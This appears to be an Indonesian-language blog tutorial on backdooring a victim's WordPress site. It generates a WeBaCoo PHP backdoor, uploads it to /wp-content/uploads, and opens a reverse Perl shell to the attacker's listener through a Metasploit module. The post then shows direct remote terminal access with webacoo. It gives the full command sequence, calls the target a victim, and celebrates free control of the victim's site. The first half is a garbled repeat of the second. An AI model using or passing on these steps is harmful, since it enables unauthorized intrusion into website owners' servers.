Equipments:
1. WeBacoo
2. Metasploit
pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/
bagi yg belum ada tools ini silahkan download terlebih dahulu
selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/
agar file tersebut dapat di akses menggunakan metasploit.
selanjutnya kita cek apakah module tersebut siap di eksekusi:
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php
selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php
selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan
terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:
-u = Url Backdoor
1. WeBacoo
2. Metasploit
pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/
bagi yg belum ada tools ini silahkan download terlebih dahulu
# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob : selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/
agar file tersebut dapat di akses menggunakan metasploit.
# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :selanjutnya kita cek apakah module tersebut siap di eksekusi:
# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php
selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php
selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :
msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakanLHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan
terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:
# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection-u = Url Backdoor
0 komentar:
Posting Komentar